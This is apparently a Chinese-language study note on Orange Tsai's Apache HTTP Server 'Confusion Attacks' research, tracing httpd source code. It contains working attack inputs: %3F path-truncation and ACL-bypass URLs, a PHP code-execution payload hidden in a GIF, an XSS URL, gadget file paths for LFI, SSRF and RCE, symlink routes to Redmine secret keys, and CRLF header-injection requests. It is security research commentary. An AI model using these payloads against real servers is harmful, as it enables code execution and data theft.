Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! 閱讀筆記

source

來自orange大大發表的 https://blog.orange.tw/2024/08/confusion-attacks-ch.html

apache source code
https://github.com/apache/httpd/

前言

挑選apache的原因是，整個 Httpd 的服務需要由數百個小模組合作完成客戶端的 HTTP 請求，但是在彼此模組間實作理解上的差異及不了解，可能導致漏洞(中間那塊是模組彼此共享的大struct)

官方列出的模組:
https://httpd.apache.org/docs/2.4/mod/

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

way to run php

mod_php
php_fpm
mod_fastcgi
…

攻擊面1: Confusion Attacks

Filename Confusion

首先r->filename 感覺是個檔案系統路徑，然而在 Httpd 中，有些模組會把它當成網址來處理

如下，mod_rewrite(RewriteRule 語法將路徑透過指定的規則改寫)會把它當網址處理

RewriteRule Pattern Substitution [flags]

像是


RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

若我們請求 http://server/user/orange

根據/user後面找到/orange放入$1
來抓到

/var/user/orange/profile.yml

https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}

這邊看到

splitout_queryargs(r, p->flags)

追進去看到 https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L771

static void splitout_queryargs(request_rec *r, int flags)
{
    char *q;
    int split, skip;
    int qsappend = flags & RULEFLAG_QSAPPEND;
    int qsdiscard = flags & RULEFLAG_QSDISCARD;
    int qslast = flags & RULEFLAG_QSLAST;

    if (flags & RULEFLAG_QSNONE) {
        rewritelog((r, 2, NULL, "discarding query string, no parse from substitution"));
        r->args = NULL;
        return;
    }

    /* don't touch, unless it's a scheme for which a query string makes sense.
     * See RFC 1738 and RFC 2368.
     */
    if ((skip = is_absolute_uri(r->filename, &split))
        && !split) {
        r->args = NULL; /* forget the query that's still flying around */
        return;
    }

    if (qsdiscard) {
        r->args = NULL; /* Discard query string */
        rewritelog((r, 2, NULL, "discarding query string"));
    }

    q = qslast ? ap_strrchr(r->filename + skip, '?') : ap_strchr(r->filename + skip, '?');

    if (q != NULL) {
        char *olduri;
        apr_size_t len;

        olduri = apr_pstrdup(r->pool, r->filename);
        *q++ = '\0';
        if (qsappend) {
            if (*q) {
                r->args = apr_pstrcat(r->pool, q, "&" , r->args, NULL);
            }
        }
        else {
            r->args = apr_pstrdup(r->pool, q);
        }

        if (r->args) {
           len = strlen(r->args);

           if (!len) {
               r->args = NULL;
           }
           else if (r->args[len-1] == '&') {
               r->args[len-1] = '\0';
           }
        }

        rewritelog((r, 3, NULL, "split uri=%s -> uri=%s, args=%s", olduri,
                    r->filename, r->args ? r->args : "<none>"));
    }
}

總之他會把?後面的參數省略掉，所以如果使用
%2F -> /
%3F -> ?

http://server/user/orange%2Fsecret.yml%3F

這樣會變成

/var/user/orange/secret.yml?profile.yml

問號後面被當參數省略

/var/user/orange/secret.yml

路徑截斷就達成了

Mislead RewriteFlag Assignment

若管理員使用了下列方式設定

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

如果請求附檔名是 .php 結尾則加上 mod_php 相對應的處理器
https://httpd.apache.org/docs/2.4/rewrite/flags.html

這邊設置了
[H=application/x-httpd-php]

H -> header
意思是把.php，設置內容類型（MIME 類型），伺服器應將匹配的文件作為 PHP 文件處理

那如果我把一張 1.gif 設為

<?=`id`;>

如果單純請求

http://server/upload/1.gif

那理論上它是個.gif啥都不會執行

但是如果我這樣請求

http://server/upload/1.gif %3F ooo.php

因為結尾是.php所以接下來會把檔案強制解析成.php，接著?截斷把ooo.php丟棄，最後1.gif被當.php解析執行

<?=`id`;>

印出

 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

ACL Bypass

what is apache ACL?
https://httpd.apache.org/docs/2.4/howto/access.html

Filename Confusion 的第二個攻擊手法發生在 mod_proxy 身上，相較前一個攻擊是無條件將目標當成網址處理，這次則是因為模組間對 r->filename 的理解不一致所導致的認證及存取控制繞過

mod_proxy 在做的事情就是將請求導向到其它網址上
所以會把 r->filename 解析成url

https://httpd.apache.org/docs/current/mod/core.html#files

首先是可以用apache server的file對於單一檔案加上限制，在預設安裝的 PHP-FPM 環境中，這種設定可以被直接繞過

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

若我今天用這種方式請求

http://server/admin.php%3Fooo.php

此時 r->filename 欄位是 admin.php?ooo.php 理所當然與 admin.php 不符合

再來預設 PHP-FPM 在收到請求後預設透過set-handler -> mod_proxy

https://blog.csdn.net/qq_21956483/article/details/82847744

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

mod_proxy 會將 r->filename 重寫成以下網址

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

後端在收到檔案名稱會進行特別處理
以下是處理邏輯
https://github.com/php/php-src/blob/ce51bfac759dedac1537f4d5666dcd33fbc4a281/sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

一樣也可以看到針對 ? 進行截斷，取出實際的檔案路徑並執行 (也就是 /var/www/html/admin.php)

p = strchr(env_script_filename, '?');
if (p)
    *p = 0;

這樣就可以bypass file限制了

認證模組以及 mod_proxy 間對 r->filename 欄位理解的不一致 -> bypass

總結

HTTP -> access checker -> /var/www/html/admin.php?ooo.php(r->filename)

HTTP -> mod_proxy -> proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

?截斷，訪問proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php

攻擊面2: DocumentRoot Confusion

針對這個設定

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

若訪問這樣

http://server/html/about

會訪問到 /var/www/html/about.html 還是 /about.html 呢?
ans: 兩個都會

因為httpd會去嘗試存取帶有 DocumentRoot 的路徑以及沒有的路徑
https://github.com/apache/httpd/blob/c3ad18b7ee32da93eabaae7b94541d3c32264340/modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}

https://httpd.apache.org/docs/current/rewrite/remapping.html#rewrite-query
從官方範例文件可以看到一些有問題的寫法

RewriteRule  "^/html/(.*)$"  "/$1.html"

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

若能控 RewriteRule 的目標前綴那我們是不是就能瀏覽作業系統上的任意檔案了嗎?

開始基於項設定做攻擊

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"

Local Gadgets Manipulation!

到了這邊，或許會想說可以去讀像是/etc/passwd等任意檔案但其實不然，原因是

<Directory />
    AllowOverride None
    Require all denied
</Directory>

https://luckymrwang.github.io/2015/06/03/Apache-AllowOverride-None-及-Option-详解/
https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115
apache內建把根目錄及其所有子目錄的存取禁用，他會忽略.htaccess的rewrite規則，避免了危險的rewrite

不過這邊發現了 ubuntu/debian上
https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

/usr/share是被允許存取的，所以可以嘗試利用這份文件中，所有的教學範例、說明文件、單元測試檔案來濫用
也就是把檔案當gadget串出各種攻擊

Local Gadget to Information Disclosure

websocketd:
/usr/share/doc/websocketd/examples/php/ 下的範例php可以leak 敏感環境變數
https://github.com/Textalk/websocket-php/tree/master/examples

像是NGINX跟jetty也有許多可以利用，這些服務的預設 Web Root 就在 /usr/share，所以可以讀出很多敏感資訊

/usr/share/nginx/html/
/usr/share/jetty9/etc/
/usr/share/jetty9/webapps/

另外像是Davical 套件所存在的 setup.php可以讀出phpinfo

Local Gadget to XSS

/usr/share/libreoffice/help/help.html

var url = window.location.href;
var n = url.indexOf('?');
if (n != -1) {
    // the URL came from LibreOffice help (F1)
    var version = getParameterByName("Version", url);
    var query = url.substr(n + 1, url.length);
    var newURL = version + '/index.html?' + query;
    window.location.replace(newURL);
} else {
    window.location.replace('latest/index.html');
}

這是libreoffice提供的語言切換功能
這上面把version放入到index.html前，所以newURL被加入js就可以達成XSS

/usr/share/libreoffice/help/help.html??Version=javascript:aler(1)//

Local Gadget to LFI

JpGraph、jQuery-jFeed、 WordPress 或 Moodle 外掛等自帶的教學或debug檔案可以串出LFI
/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
/usr/share/javascript/jquery-jfeed/proxy.php
/usr/share/moodle/mod/assignment/type/wims/getcsv.php

https://github.com/jfhovinne/jFeed/blob/master/proxy.php

<?php
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");

if ($handle) {
    while (!feof($handle)) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}
?>

fopen未過濾導致任意讀

Local Gadget to SSRF

MagpieRSS -> magpie_debug.php













...
if ( isset($_GET['url']) ) {
	$url = $_GET['url'];
}
else {
	$url = 'http://magpierss.sf.net/test.rss';
}


test_library_support();

$rss = fetch_rss( $url );
...

fetch_rss可以做SSRF
https://github.com/cogdog/feed2js/blob/master/magpie_debug.php

Local Gadget to RCE

舊版本的phpunit檔案存在可以直接用CVE-2017-9841
https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841

phpLiteAdmin預設密碼admin

Jailbreak from Local Gadgets

接下來是跳脫出/usr/share
Httpd 發行版中預設開啟了 FollowSymLinks
https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L160

<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>

所以可以利用symlink機制來讀到以外的檔案
https://httpd.apache.org/docs/current/mod/core.html#options

Jailbreak from Local Gadgets

Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Jailbreak Local Gadgets to Redmine RCE

Redmine的雙層symlink 到 RCE

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

從/usr/share跳到/var/lib/redmine，繼續跳到/etc/redmine讀取到了secret key

secret_key.txt是簽章所使用的 -> RoR
已知的金鑰將惡意 Marshal 物件簽章加密後嵌入 Cookie，接著透過伺服器端的反序列化最終實現遠端程式碼
https://drive.google.com/file/d/1UMxphxFxwRf7wbrw4_Hr56KGPzpLU3Ef/view

攻擊面3:Handler Confusion

這兩種都可以讓php跑起來

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

https://github.com/apache/httpd/blob/2.4.58/server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

來讀讀這段code

先檢查 r->handler 是否已設置

如果 r->handler 沒有設置，代碼會嘗試根據 r->content_type 來設置它。
根據 r->content_type 設置 handler

如果 r->content_type 已設置，代碼會將其值賦給 handler。

如果 r->content_type 沒有設置，則使用默認的 handler（AP_DEFAULT_HANDLER_NAME）
調用 ap_run_handler：

最後，通過 ap_run_handler(r) 調用 handler 來處理請求。

因此兩種方法都可以找到對的handler

Overwrite the Handler

若 apache HTTP Server 透過 AddType 將 PHP 運行起來

AddType application/x-httpd-php  .php

呼叫
http://server/config.php

type_checker 根據 addtype 設定的附檔名將相對應的內容複製到 r->content_type

而整個http週期並未給r -> handler賦值

r->content_type在進入到ap_invoke_handler前被拿來當成模組處理器使用

看到上述的source 也可以看到會根據 r->content_type 設置 handler
但是，若進入ap_invoke_handler前r->content_type會發生甚麼問題呢

Overwrite Handler to Disclose PHP Source Code

首先可以去看看這篇
https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf

若是用了錯誤的contenet length，除了報錯外，也會回傳php source code

ModSecurity 在使用 APR 沒有檢查好回傳值
導致r -> content_type被改寫成了text/html，因為它會想要丟一個錯誤的頁面而被覆寫

這就回傳了兩個回應
一個是錯誤頁面
一個是應該用application/x-httpd-php的php頁面，被覆蓋成text/html當文字回傳

造成了double response
https://github.com/owasp-modsecurity/ModSecurity/issues/2514

Invoke Arbitrary Handlers

然而觀察到一件事情是，其實只要能夠寫掉r -> content_type就會造成呼叫任意 Apache HTTP Server 的內部模組處理器

然而發生問題的地方位於最後段

到底要怎麼觸發

這邊基於這個來做

use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";

這是一段有問題的寫法，因為redir可控，導致了CRLF注入，從而造成了可以偽造標頭

https://ithelp.ithome.com.tw/articles/10242682

另外看一下RFC
https://datatracker.ietf.org/doc/html/rfc3875
他規定了網址轉址的規範

接下來就是開始追code

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

這裡檢查了Location標頭是否存在且以/開頭，並且HTTP狀態碼是200（即請求成功）。這代表伺服器希望將客戶端重定向到同一個伺服器上的不同位置

當需要進行重定向時，這行代碼會處理內部重定向。也就是說，伺服器會把當前的請求路徑替換成Location標頭指定的新路徑，然後重新處理請求

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

追進去ap_internal_redirect_handler看發現了關鍵

ap_set_content_type(new, r->content_type);

直接copy過來
所以就有一個新的http流程了

最後回來看CRLF的部分

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

這樣來偽造content-type

這樣任意控handler
就可以用惡意的圖片等，然後用想要的handler去把圖片當腳本用來執行

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

Arbitrary Handler to RCE

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

結語

其中我最喜歡的兩個部分第一個是把檔案當gadget用，透過伺服器上現有的不管是教學檔案或是任何文件濫用，串出了RCE

另外透過symlink來跳脫出當前目錄，去濫用到其他目錄的檔案，串出了RCE

原本開發者以為安全的教學文件(因為使用者戳不到)但在因為一個?被截斷後，導致存取到了伺服器上的其他資源，以及藉由方便的symlink跳脫出目錄，十分的新穎，原本看似無害的東西，透過一連串的觸發，達成RCE，真的很酷

膜拜orange orz

這邊挖個坑，日後會來復現

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! 閱讀筆記

source

前言

way to run php

攻擊面1: Confusion Attacks

Filename Confusion

Mislead RewriteFlag Assignment

ACL Bypass

攻擊面2: DocumentRoot Confusion

Local Gadgets Manipulation!

Local Gadget to Information Disclosure

Local Gadget to XSS

Local Gadget to LFI

Local Gadget to SSRF

Local Gadget to RCE

Jailbreak from Local Gadgets

Jailbreak from Local Gadgets

Jailbreak Local Gadgets to Redmine RCE

攻擊面3:Handler Confusion

Overwrite the Handler

Overwrite Handler to Disclose PHP Source Code

Invoke Arbitrary Handlers

Arbitrary Handler to RCE

結語

Read more

Pwn-heap note

Pwn-Stack based attack

ROP-EZROP(b33f adv_pwn)

CGGC Qual 2024-writeup